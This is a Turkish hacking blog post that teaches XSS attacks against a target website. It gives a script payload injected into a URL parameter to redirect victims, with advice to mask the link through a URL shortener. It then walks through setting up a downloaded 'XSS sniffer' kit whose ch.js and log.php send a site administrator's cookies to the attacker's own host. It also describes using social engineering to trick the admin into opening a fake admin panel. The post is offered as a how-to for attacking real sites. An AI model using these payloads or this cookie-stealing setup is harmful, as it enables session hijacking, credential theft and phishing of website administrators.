Başlık | Hedef Site Hacking V-3 |
Yetki | rw-r--r-- |
Yazar | RedAdalet |
Zaman | 08:13:00 |
Kategori | |
Share |
1- Hedef siteye yönledirmek istediğiniz sayfayı koymak.
2- Sniffer aracılığıyla adminin kullanıcı adı ve şifresiniz almak.
Saldırı 1
- Hedef sitemiz www.hedefsite.com/index.php?id=12 olsun buradaki id’den sonraki değeri silip yerine <script>document.location.href= "www.yönledirmekistediğinizsite.com"</script>
şeklinde kurbana yedirebiliriz. Ancak vereceğiniz sitenin daha inandırıcı olması için bunu link kısaltma servisleri yoluyla kısaltabilirsiniz. Örnek : Bitly
Yani şöyle olacak : www.hedefsite.com/index.php?id=<script>document.location.href= "www.yönledirmekistediğinizsite.com"</script>
Saldırı 2
- XSS sniffer adminin kullanıcı adı ve şifresini cookie yoluyla alacağız. XSS Snifferı <a href= "https://www.mediafire.com/?d9n22pmzerdxhmv">https://www.mediafire.com/?d9n22pmzerdxhmv</a> indirebilirsiniz. Şimdi XSS Sniffer içindeki dosyaları ch.js ve index.html’deki bazı şeyleri değiştireceğiz.
- ch.js ’yi txt’e olarak kaydederek açalım http://siteadresiniz.com/Sniffer/sniffer.php?c diye bir yazı var bu yazıdaki siteadresiniz yazan kısma site adresinizi yazıyorsunuz Tabiki sniffer adı altında olarak. Sonra
ch.js olarak kaydedip çıkıyoruz.
- index.html’i txt olarak açıyoruz karşınıza http://xssadresi= diye bir yazı çıkacak buraya XSS açığını bulduğumuz sitenin adresini yazıyoryuz. Sonra http://siteadresiniz/Sniffer/ch.js siteadresi yazan kısma kendi
sitenizin adresini yazıyorsunuz. index.html olarak kaydedip çıkıyorsunuz.
- Sonra sniffer adlı klosörümüzü FTP adresimize atıyoruz. http://siteadresiniz.com/Sniffer/log.php adresine giriyorsunuz. Kullanıcı Adı: admin Şifre: admin tabiki burada hedef site sahibine ait bilgi bulamayacaksınız.
- Amaç: index.html ’i hedef site adminine göndermektir burada admini sahte bir admin paneli karşılayacaktır. Tabi bunu yedirmek için biraz sosyal mühendislik gerekiyor. Admin index.html ’e tıkladıktan sonra
cookie bilgileri http://siteadresiniz.com/Sniffer/log.php buraya gelecektir.
0 yorum:
Yorum Gönder
Makalemizi Okuduysanız Yorum yapabilirsiniz. Küfürlü Yorumlar Silinir Ve Kullanıcı Engellenir. İlginiz İçin Teşekkür Ederiz
#RedHatzOpTurkey